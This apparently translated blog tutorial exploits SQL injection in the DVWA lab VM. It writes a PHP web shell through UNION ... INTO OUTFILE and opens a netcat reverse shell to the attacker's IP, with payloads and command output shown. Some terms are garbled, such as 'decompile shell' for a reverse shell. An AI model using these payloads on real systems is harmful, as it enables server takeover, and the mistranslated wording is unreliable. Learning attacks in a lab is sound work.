Use SQL Injection to run commands and gain shell permissions

One of the ultimate goals of hacking is to hijack and up the shell to run system commands and reach a target or network. SQL injection is usually just associated with databases and their data, but it can really be used as a vector to take over the shell. In this article, we will exploit a simple SQL injection vulnerability to execute commands and eventually decompile the shell on the server.

sql injection shell

I will use DVWA, a vulnerable virtual machine, and Kali Linux to perform the attack. If you are new to Kali, you should read this article to know how to set up and secure Kali, to make sure your system is ready for anything.

SQL Injection Overview

SQL injection is one of the most common vulnerabilities encountered on the web and also possibly one of the most dangerous. Attackers can inject malicious SQL code to extract sensitive information, modify or destroy existing data, or escalate an attack to take over the server.

There are different types of SQL injection and different attack methods for different database systems in use. Although this type of attack is one of the easiest to start learning, it can still take you several years to master SQL injection.

Step 1: Target exploration

The first thing we need to do is log into DVWA using the default credentials, admin is username and password is password.

Using SQL Injection to run commands and take over shell 25

Next, go to the “Security” tab on the left and set the security level to “low”. This will ensure our attack goes smoothly.

Using SQL Injection to run commands and take over Shell 26

Navigate to the “SQL Injection” page to initiate the attack. We can see that the function of the page is to get the user ID and return information, in this case the first and last name.

Using SQL Injection to run commands and take over shell 27

I want to verify that this input is indeed vulnerable to SQL injection. The first thing to try is to simply enter a single double quote, which will close the statement if the system is really vulnerable. And when I do so, the system returns an error, even telling us specifically that the site is using MySQL as the database. At this point, we’ve most likely found a vulnerable entry point.

Using SQL Injection to run commands and take over Shell 28

The next thing we need to do is enumerate the database and determine the number of columns in use. This will allow us to reliably exploit the union based vulnerability in just a little bit. For a better understanding, let’s see what the query command would look like during normal input submission:

select first_name, surname from users where user_id='';

This could be a query on the backend, with first_name and surname are selected columns, for a total of two columns. But we need to know for sure for this vulnerability to work. We can use order by.

This clause will sort the results of the query by columns. Since we are pretty sure that at least two columns are in use, if we will sort by 1 or 2, the query will succeed. But what if we want to order by 3? If we are correct, then this query will throw an error.

Send the following injection as input, and it will result in an error. The pound sign is used here to comment out the rest of the query so it doesn’t cause any additional syntax errors.

' order by 3 #

You can see that we actually got an error, so now we know for sure that only two columns are being used.

Using SQL Injection to run commands and gain shell permissions 29

Step 2: Access the shell and exploit the command

Now that we have a bit more information about the database, we can use this to our advantage to perform SQL injection based on union. The union operator is used in SQL to combine the results of two or more select statements, but for it to work properly, the statements must have the same number of columns. This is why we need to learn the backend sooner.

There are so many things we can do with injections based on union, but in this article, we need to take care of taking advantage of this vulnerability to run operating system commands. One of the easiest ways to do this is to load up a simple PHP shell to pass our commands through.

We need to define the root directory of the web server to load the shell. Depending on the application and the type of web server in use, the root directory may be different, especially if the administrator changes the default location or has sufficient permissions. For the purposes of this attack, we will assume that the default Apache web root (/var/www/) is being used with public write permissions. Information about the web server, including the root directory, can usually be found in the file “phpinfo.php”.

We can use the into outfile command to write to a file. In this case, we will insert a simple PHP script that can run system commands. The script that I named “cmd.php”, will look like this:

<?php system($_GET["cmd"]); ?>

Now, we will perform injection. We will need to use double quotes in the script because we need to enclose the second part of the statement in single quotes – this will avoid syntax errors. The complete injection command should look like this:

' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #

If this command works properly, we will be able to access our shell through the URL and by providing the system command as a parameter. For example, whoami will give us the current user information.

Using SQL Injection to run commands and take over shell 30

Or uname -a, will give us information about the system.

Using SQL Injection to run commands and take over Shell 31

But providing all these commands via the URL parameter is boring. We can take advantage of this to reverse the shell and go one step further.

Step 3: Decompile Shell with Netcat

Netcat is a powerful network utility used to troubleshoot connectivity issues, but it can actually be used by hackers as a backdoor and as a method for shell hijacking. A lot of Linux distributions have this utility installed by default, so if we can access this tool it’s game over.

First, we’ll need to set up a listener on our local machine. Use the nc command along with -lvp to specify it to listen and to set the corresponding port number.

nc -lvp 1234
listening on [any] 1234 ...

Next, as a parameter to the PHP shell in the URL, enter the following command. It asks the server to execute a shell (-e/bin/sh) and sends it back to our local machine. You need to make sure to use the proper IP address and port.

nc 172.16.1.100 1234 -e /bin/sh

Wait a few seconds and we should see our listener catch the shell and open a connection. From here, we can run commands like id, uname -a and ps.

connect to [172.16.1.100] from (UNKNOWN) [172.16.1.102] 47643
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ps
  PID TTY          TIME CMD
 4665 ?        00:00:00 apache2
 4669 ?        00:00:00 apache2
 4671 ?        00:00:00 apache2
 4673 ?        00:00:00 apache2
 4674 ?        00:00:00 apache2
 4803 ?        00:00:00 apache2
 4810 ?        00:00:00 apache2
 4914 ?        00:00:00 php
 4915 ?        00:00:00 sh
 4919 ?        00:00:00 ps

We now have the means to execute commands on the web server from our own terminal, all from a simple SQL injection vulnerability. I hope this practical article will help you absorb more knowledge.

Leave a Reply